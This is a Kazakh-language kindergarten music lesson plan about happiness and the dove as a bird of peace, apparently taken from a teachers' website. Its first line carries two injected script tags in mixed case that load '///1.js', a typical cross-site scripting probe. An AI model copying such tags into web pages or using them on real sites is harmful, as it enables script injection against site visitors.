<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.11.2017

№7

Тақырыбы: «Мен бақытты баламын»

Мектеп/Мұ: «Капитоновка  ОМ» КММ

Күні:

Педагогтің  аты-жөні:  Курмахан 

М.

Сынып/ 0 «А»

Қатысқан   балалар  саны: 3

Қатыспаған  балалар  саны: 0

ҰОҚ-нің  оқытылу

мақсаты:

0.1.2.1. Музыка

жанрларын (күй, ән, би, марш) ажырату.

0.1.1.2. Музыкалық шығарманың сипатын ажырату (көңілді, салтанатты, қуанышты,

ашық-жарқын, көңілсіз, мұңды, қайғылы).

0.3.1.1. Музыкаға қосылып, оның  сипатына сәйкес  ырғақты, мәнерлі қозғалыстар  орындау  ұзақтығына (ұзақ, қысқа), қаттылығына (қатты, ақырын).

0.1.1.4. Музыкалық  дыбыстың  негізгі  қасиеттерін  жоғарылығына (жоғары-төмен дыбыс),  тембріне қарап ажырату.

Күтілетін  нәтиже

Барлық  балалар:

Музыка жанрларын (күй,

ән, би, марш) ажырата алады.

Көпшілік  балалар:

Музыкалық  шығарманың  сипатын 

ажырата  біледі (көңілді,

салтанатты, қуанышты, ашық-жарқын, көңілсіз, мұңды, қайғылы).

Кейбір  балалар:

Музыкаға  қосылып, оның  сипатына сәйкес  ырғақты, мәнерлі қозғалыс-тар  жасай алады.

Музыкалық  дыбыстың  негізгі 

қасиеттерін  жоғарылығына

(жоғары-төмен дыбыс), тембріне 

қарай  ажырата  алады.

Тілдік  мақсат

Балалар:

Әуеннің сипатын, көңіл күйін, өз ойларын жеткізе әңгімелей біледі.

Көптілділік: көгершін – голубь – dove.

Негізгі терминдер мен сөз тіркестері:

Марш, күй, жоғары-төмен.

Пікір алмасу сұрақтары:

Музыкадан

қандай әсер алдың?

Тыңдаған әнді қалай бейнелер едің?

Әннің мәтіні не туралы?

Өткен  ҰОҚ-нен алған  білім

Өткен  сабақтарда алған  білімдерін көрсете  алады, музыкалық шығарманың  түрлерін 

ажырата  біледі.

Өз  ойларын  еркін 

жеткізе әңгімелейді.

Жоспар

Жоспарланған  уақыт

Жоспарланған  іс-әрекет

Ресурстар

Дұрыс әсерлі көңіл күй  орнату   0-2 минут

Өмірлік тәжірибені

маңыздандыру.

Мақсатты болжам

3-5 минут

Музыкалық

сәлемдесу. «Сәлеметсіз бе!

Здравствуйте! Good morning!» (әндете амандасу).

Балаларға кезекпен допты лақтыру арқылы сұрақтар қойылады,

жауаптар тыңдалады.

– Бақыт деген не?

– Бақытты болу үшін не істеу керек?

– Достарыңа бақытты болу үшін қандай тілек айтасың?

Музыкалық

сүйемелдеу

 


Доп

ҰОҚ-нің ортасы

III. Тақырып бойынша

жұмыс   6-27 минут

Т) Музыка тыңдау: «Ақ көгершін»

(муз. Қ.Қалқатаев, сөзі Е. Баят).

«Еркін самғап ұшсын» деп,

Мәпелейміз, баптаймыз.

«Бейбітшілік құсы» деп,

Қайсы  құсты біз мақтаймыз?

– Ән сендерге ұнады ма? Неліктен? Ән қанша бөліктен тұрады?

Мазмұнын әңгімелеп беруді ұсыну.

(Т, Ж) Дауыс жаттығулары. «Тақ-тұқ», «Көңілді алақандар мен

балақандар» жаттығулары. Дауыссыз дыбыстарды анық айтуға үйрету.

«Бейбітшілік құсы – көгершін» деп

таныстыру.

Көгершін – голубь – dove

(Т) Музыкалық-ырғақты қозғалыс: «Қазіргі би ырғағы»  (муз. Е. Лапин).

Музыкалық шығарманың сипатын мағыналы түрде көрсетуге  дағдыландыру. Заманауи би  элементтерін Полька (Б. Сметан),

ұлттық  би («Айгөлек») түрлерімен  салыстыру, айырмашылықтарын түсіндіру.

(Т, Ж) Әліппе-дәптермен жұмыс:

1-сабақ. Айсұлудың сұрағы мен тапсырмасы: *Бейбітшілікті сен  қалай елестетесің? Өз қиялыңмен қалаған

суретіңді сал. Салған суретің туралы әңгімелеп бер.

*Бұл ән қандай құс туралы?

*Әннің қарқыны, көңіл күйі қандай?

*Сен бұл құсты білесің бе?

Мына құстардың арасынан көгершінді тауып, белгіле.

«Ақ көгершін» әні

 

 

 

 

 

 

 


«Тақ-тұқ», «Көңілді алақандар мен 

балақандар»

жаттығулары


 

 

 

«Біз бақытты

баламыз» әні

 

 

Қазіргі би ырғағы»

музыкасы

Би элементтері

көрсетілген суретті

материалдар

 

 

Әліппе-дәптер,

түрлі түсті

қарындаштар

ҰОҚ-нің қорытындысы.

Рефлексия

28-30 минут

(Р) Бүгінгі сабақ туралы балалардың пікірлерін тыңдау. Сабақты  балалардың көмегімен қорытындылау, бағалау.

– Егер  сабақ қызықты өтті деп ойласаң,

әліппе-дәптердің  төменгі  бұрышындағы ортасында соль кілті  бар 

шеңберді жасыл  түспен, ал

қызықты болмаса, қызыл  түспен  бояп 

белгіле.

Әліппе-дәптер,

түрлі түсті

қарындаштар

 

Просмотров: 2726


Пікір қосу



Деректерді қолтаңбаға қосу
Текст